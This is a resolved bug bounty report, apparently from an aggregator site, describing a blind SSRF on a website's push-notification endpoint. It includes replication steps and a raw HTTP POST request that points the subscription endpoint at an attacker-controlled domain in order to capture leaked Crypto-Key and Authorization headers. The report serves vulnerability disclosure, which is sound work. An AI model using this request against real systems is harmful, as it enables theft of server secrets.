Loading HuntDB...

Blind SSRF at https://chaturbate.com/notifications/update_push/

High
C
Chaturbate
Submitted None
Reported by robin0oklay

Vulnerability Details

Technical details and impact analysis

Server-Side Request Forgery (SSRF)
In the application at https://chaturbate.com/notifications/update_push/ there is a functionality to subscribe any cam model which will trigger the provided request. Using this Request an attacker can execute SSRF attack and also steal sensitive Token / Keys of the internal web server Steps to Replicate the submission:- Login to your https://chaturbate.com/ account or use my account- USERNAME-██████████ PASSWORD-███████ Now click on profile, or trigger any request so that you can get your Cookie / CSRF token. Send any request to repeater and replace it with the provided request POST /notifications/update_push/ HTTP/1.1 Host: chaturbate.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: */* Accept-Language: en-US,en;q=0.5 Referer: https://chaturbate.com/princesscin/ Content-Type: application/x-www-form-urlencoded X-CSRFToken: YOURCSRFHERE X-Requested-With: XMLHttpRequest Content-Length: 408 Cookie: YOURCOOKIEHERE Connection: close subscription={"endpoint":"http:\/\/███\/wpush\/v2\/████&unsub=false As you can see that I have changed the actual URL to my domain ████████, so that I can get the actual request send to the server. Put your cookie and CSRF token (you can copy CSRF token from your cookies) over here and than send this request Go to this URL to confirm SSRF at - http://████████████ you will find that your Crypto-Key, Encryption header and Authorization Header is getting leaked onto the Attackers malicious site. These headers are very sensitive to be leaked and hence needs to be fixed as soon as possible. ##Note The application do not require to send the URL along with the domain, it is secure to only send the Rest part of the URL and do not include the domain so that the attacker could not control the complete request. Thanks Regards Robin Ooklay ## Impact Using this Request an attacker can execute SSRF attack and also steal sensitive Token / Keys of the internal web server.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Server-Side Request Forgery (SSRF)